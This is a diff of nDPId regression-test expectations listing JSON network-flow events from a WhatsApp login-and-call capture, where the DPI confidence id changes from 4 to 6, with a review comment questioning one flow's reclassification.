00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582227884,"flow_last_seen":1432582228167,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.14","src_port":49203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225324,"flow_last_seen":1432582225533,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.55","src_port":49165,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
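Review bot: The `end` event for flow_id 6 changes in substance here, not just in the confidence id: `"flow_state":"info"` becomes `"flow_state":"finished"`, and the record gains `"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS",...}`, with the length prefix growing from `00592` to `00678`. This is a midstream flow (`"midstream":1`) that previously ended without a classification, so the new library now reports a DPI-level result where the old one reported none. It is worth confirming against the libnDPI changes that this reclassification is intended before accepting the regenerated expectation, since downstream consumers will treat a `finished` state with DPI confidence as an authoritative detection.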
@@ -293,58 +293,58 @@ 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582233751,"flow_last_seen":1432582233926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.49","src_port":49191,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224208,"flow_last_seen":1432582224417,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49169,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224208,"flow_last_seen":1432582224417,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49169,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432582271840,"flow_last_seen":1432582331780,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":3000,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1432582222253,"flow_last_seen":1432582223191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":876,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432582271840,"flow_last_seen":1432582331780,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":3000,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1432582222253,"flow_last_seen":1432582223191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":876,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} 00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249292,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249292,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310666,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"173.252.114.1","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310666,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"179.60.192.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310666,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"173.252.114.1","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310666,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"179.60.192.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582244297,"flow_last_seen":1432582244462,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.31","src_port":49164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582244297,"flow_last_seen":1432582244462,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.31","src_port":49164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582331561,"flow_last_seen":1432582331825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.39","src_port":49197,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582331561,"flow_last_seen":1432582331825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.39","src_port":49197,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310665,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1432582296339,"flow_last_seen":1432582310668,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":2153,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.84.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296339,"flow_last_seen":1432582310667,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.74.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310667,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.90.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296337,"flow_last_seen":1432582310664,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296337,"flow_last_seen":1432582310664,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310665,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1432582296339,"flow_last_seen":1432582310668,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":2153,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.84.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296339,"flow_last_seen":1432582310667,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.74.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310667,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.90.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296337,"flow_last_seen":1432582310664,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296337,"flow_last_seen":1432582310664,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249492,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249492,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582250339,"flow_last_seen":1432582250618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49200,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582250339,"flow_last_seen":1432582250618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49200,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":198,"flow_first_seen":1432582303300,"flow_last_seen":1432582311036,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":22102,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":52794,"dst_port":9665,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432582246280,"flow_last_seen":1432582336425,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2008,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 